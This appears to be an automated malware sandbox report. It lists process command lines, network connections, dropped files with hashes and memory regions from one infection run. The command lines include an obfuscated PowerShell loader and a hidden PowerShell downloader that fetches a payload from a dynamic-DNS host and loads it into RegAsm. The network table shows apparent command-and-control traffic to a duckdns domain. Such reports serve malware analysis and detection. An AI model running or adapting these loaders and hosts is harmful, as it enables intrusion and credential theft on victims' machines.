⼀G8㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀eQBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BN㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀VgBB㆛ ⺞ ⏬ ⦦ ⼀Ek㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀bwBr㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀K㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀dQBs㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Fs㆛ ⺞ ⏬ ⦦ ⼀bwBi㆛ ⺞ ⏬ ⦦ ⼀Go㆛ ⺞ ⏬ ⦦ ⼀ZQBj㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀WwBd㆛ ⺞ ⏬ ⦦ ⼀F0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀B4㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBN㆛ ⺞ ⏬ ⦦ ⼀Es㆛ ⺞ ⏬ ⦦ ⼀TgBT㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀M㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀y㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀Nw㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀DE㆛ ⺞ ⏬ ⦦ ⼀Lg㆛ ⺞ ⏬ ⦦ ⼀5㆛ ⺞ ⏬ ⦦ ⼀D㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀MQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀DM㆛ ⺞ ⏬ ⦦ ⼀Lg㆛ ⺞ ⏬ ⦦ ⼀y㆛ ⺞ ⏬ ⦦ ⼀Dk㆛ ⺞ ⏬ ⦦ ⼀MQ㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀OgBw㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀FI㆛ ⺞ ⏬ ⦦ ⼀ZQBn㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBt㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQBz㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀B9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㆛ ⺞ ⏬ ⦦ ⼀','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MKNS/02/741.901.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zwogkiwmdapiaocrcpyqtwcwpd"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jqtzlbhnrihvduqvlakjwjwnqkkjc"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mszrmtshfqzaninzulflhorvzqbsvlzh"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 192.3.109.147:80 | 192.3.109.147 | tcp |
| US | 8.8.8.8:53 | 147.109.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
| US | 8.8.8.8:53 | 236.76.55.191.in-addr.arpa | udp |
| US | 192.3.109.147:80 | 192.3.109.147 | tcp |
| US | 8.8.8.8:53 | serversw.duckdns.org | udp |
| US | 135.148.195.248:6875 | serversw.duckdns.org | tcp |
| US | 135.148.195.248:6875 | serversw.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 248.195.148.135.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
memory/4284-0-0x000000007162E000-0x000000007162F000-memory.dmp
memory/4284-1-0x0000000004D70000-0x0000000004DA6000-memory.dmp
memory/4284-2-0x0000000071620000-0x0000000071DD0000-memory.dmp
memory/4284-3-0x0000000005520000-0x0000000005B48000-memory.dmp
memory/4284-4-0x0000000005390000-0x00000000053B2000-memory.dmp
memory/4284-5-0x0000000005430000-0x0000000005496000-memory.dmp
memory/4284-6-0x00000000054A0000-0x0000000005506000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfavyy3o.r34.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4284-16-0x0000000005D10000-0x0000000006064000-memory.dmp
memory/4284-17-0x0000000006310000-0x000000000632E000-memory.dmp
memory/4284-18-0x0000000006360000-0x00000000063AC000-memory.dmp
memory/4284-20-0x000000006DEE0000-0x000000006DF2C000-memory.dmp
memory/4284-21-0x000000006E080000-0x000000006E3D4000-memory.dmp
memory/4284-19-0x0000000007310000-0x0000000007342000-memory.dmp
memory/4284-31-0x0000000006920000-0x000000000693E000-memory.dmp
memory/4284-32-0x0000000071620000-0x0000000071DD0000-memory.dmp
memory/4284-33-0x00000000075F0000-0x0000000007693000-memory.dmp
memory/4284-34-0x0000000071620000-0x0000000071DD0000-memory.dmp
memory/4284-35-0x0000000071620000-0x0000000071DD0000-memory.dmp
memory/4284-36-0x0000000007D20000-0x000000000839A000-memory.dmp
memory/4284-37-0x00000000076A0000-0x00000000076BA000-memory.dmp
memory/4284-38-0x0000000007700000-0x000000000770A000-memory.dmp
memory/4284-39-0x0000000007920000-0x00000000079B6000-memory.dmp
memory/4284-40-0x0000000007880000-0x0000000007891000-memory.dmp
memory/4284-41-0x00000000078B0000-0x00000000078BE000-memory.dmp
memory/4284-42-0x00000000078C0000-0x00000000078D4000-memory.dmp
memory/4284-43-0x0000000007900000-0x000000000791A000-memory.dmp
memory/4284-44-0x00000000078F0000-0x00000000078F8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.cmdline
| MD5 | d311574d03b4993f3aa304bf67f96925 |
| SHA1 | 0b7e49c32256f080a00f24e2d52d51bd3429c755 |
| SHA256 | 8abe2889091a1281271e0f0cdbd195ba6022a1968378bb94426297204ca5231e |
| SHA512 | ac85d204e35d976ada09768dd8eb15504acdcece6b5dc29e278ee9a391baab6928b6b1293a001f8013d05951479179ad5b6767db5f8b27205d66ad2ee53bca9f |
\??\c:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.0.cs
| MD5 | 4e9de40112f74a35c04e70ff765bd2d9 |
| SHA1 | e1b87ff8213b319bd6dc8a34c6753a0891b080c3 |
| SHA256 | 1f50f29e22249d0a44023ab9bf900cfb9749cb222541f6fe7b81a9eebc971dfc |
| SHA512 | bf910e45a2fa3fc6790dd7a3b930fd2b24964af2e3cbd049df1da73ad271967731c7b8a8f29d89d542071a80e0388c0e12130b24d606a55da955f838effa931e |
\??\c:\Users\Admin\AppData\Local\Temp\1gtdujx5\CSC753D5C0F1284F02B1C3A2396961AB97.TMP
| MD5 | 5924f990e71212f415e3e338178170bc |
| SHA1 | a8f929db905e7485007a0b4b5ddd9be2e79e9fc0 |
| SHA256 | 0b24bb8764b1e2e124a9f5516e8d3c3636637630e385d1015ab19f5471722cbc |
| SHA512 | 82f2e5644e54c1de15b0067d1c33ba13c488cb3745c7d1631d34ab8cc13ea74f3d5fd4592ba9af44853b71889116ad5c4c2c478d9358ef6859ead85275025132 |
C:\Users\Admin\AppData\Local\Temp\RESD254.tmp
| MD5 | 22b4ec34e2980d63c25653b1e40ac744 |
| SHA1 | 542ebfffb86efe581bc6887c51e06eed1f2a58c5 |
| SHA256 | d4332a4049a41dd4049e61450096e5d30dbbf35763625766eca8fa2c64896706 |
| SHA512 | e7f9b662bc5682e257d7e2765177ac5729cee6560f1a29cb123f3863279ad0f66c511b33e5c28591d0415cbcbd48f6793fbda9bf271aec58bb0e8e5292d88f45 |
C:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.dll
| MD5 | 1a35ca085bc3e8776a10ab629fbfea4f |
| SHA1 | 1ae0f49eeee4c3d571c1ba9464ec9d7c914a9f83 |
| SHA256 | e11fe36cd48c3d56ea6705f9815f81601f65beee880b0ed8bf8e512baaef5aa7 |
| SHA512 | 3ff04c6ca3c31776126febba715b6d040b3fd378a62e41ae62217fb67622f1af18548acf4e3c74f935a737961d382951c2067a848ae7e4dff684bef4d73628a0 |
memory/4284-57-0x00000000078F0000-0x00000000078F8000-memory.dmp
memory/4284-63-0x0000000007BB0000-0x0000000007BD2000-memory.dmp
memory/4284-64-0x0000000008950000-0x0000000008EF4000-memory.dmp
C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS
| MD5 | bbb5526e4329ba09ff5e50938cacf20f |
| SHA1 | 3ad1ef94e2ffbe311f3d9017c2f3781d00869951 |
| SHA256 | 700af46841a34b035ee7431fd07fe6bbd13651c58a704aed14df47cd74ce76ac |
| SHA512 | 5919fa788df8b2398078be672ea05a97fa273a4a0dceb8f96d5ba53b336567aeb7132a11ce99ecac7d763c1cb8ddfd2fefaf9607d74885b5927bcaf5de4b4d14 |
memory/4284-70-0x0000000071620000-0x0000000071DD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 9faf6f9cd1992cdebfd8e34b48ea9330 |
| SHA1 | ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e |
| SHA256 | 0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953 |
| SHA512 | 05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97 |
memory/220-81-0x0000000005E80000-0x00000000061D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 79904f66bb3ba5a30074e63af6097f48 |
| SHA1 | daadf5af84da8f2adcb90cf90aa37186ccaa7a7e |
| SHA256 | 11b5f0a0da972d12315464c0d34b0f0d913e50f66fe43e01cf8859c42b05352a |
| SHA512 | a8e256d3765edcf99c957cb31693476fb1e3b8858d8320a069840980cfe37554ce92a2fc5b31a07e1acb987e051046ead40dc1f0a3dadcdead1721c092802c5a |
memory/2720-92-0x0000000007A00000-0x0000000007B22000-memory.dmp
memory/2720-93-0x0000000007BC0000-0x0000000007C5C000-memory.dmp
memory/1648-94-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-102-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-99-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-98-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-96-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 05e68ca79bb3b6107e86a167d016a4b4 |
| SHA1 | 01fb37018ad509986e1d53d8482d02b4fdf69bac |
| SHA256 | ce68d33dc71e1f9356ca12e229f848a931b66d775d01699e441523f4af4bd735 |
| SHA512 | f31dffd70904dca37ce0a68d196b60c094b1af8355910b37557b6586a46975b37bf4a530b16f750989f48413bc86d02e00b2f14210193d23e90f9a492978ff7f |
memory/1648-105-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-106-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-107-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-108-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-109-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-111-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2160-112-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4908-113-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4908-115-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2448-114-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2160-122-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2160-121-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2160-119-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2448-118-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4908-117-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2448-116-0x0000000000400000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\zwogkiwmdapiaocrcpyqtwcwpd
| MD5 | 1891919175c888ce82e9bd8a047b01ad |
| SHA1 | 502a6892a5d27ecb791ac5aa6d8586944f540453 |
| SHA256 | a6c43b4e4b8681cf0ef56c49c730fa77e34dc82db0260253a3ba75039030b9ec |
| SHA512 | 8bb940050b1abf6c27db133ed446f41e108f670f361ed5102408832ce33d9b87cd0880723441f1632292eeeb0a319c4e0fac0ea659eb55ebe1130cc3e6c776a3 |
memory/1648-128-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1648-132-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1648-131-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1648-133-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-138-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-139-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nert\logs.dat
| MD5 | a089abc48493601dc7126b7094897b91 |
| SHA1 | 19fe730ce0196712c6aee08e24a6a5839002abda |
| SHA256 | d9ccacd2e0812c6a5e5735eeef520bcbee81d5468bb3095f029702c97eb62d92 |
| SHA512 | e1266e5a7f10d66cdb3959b853aa8159f72450b0fda088332f125c78e5abb60d81ebc797e7a6123cee4a250f8e6e20d6fe3283a30754fa1ad02ad430824c7dff |
memory/1648-146-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-147-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-155-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-154-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-162-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1648-163-0x0000000000400000-0x0000000000482000-memory.dmp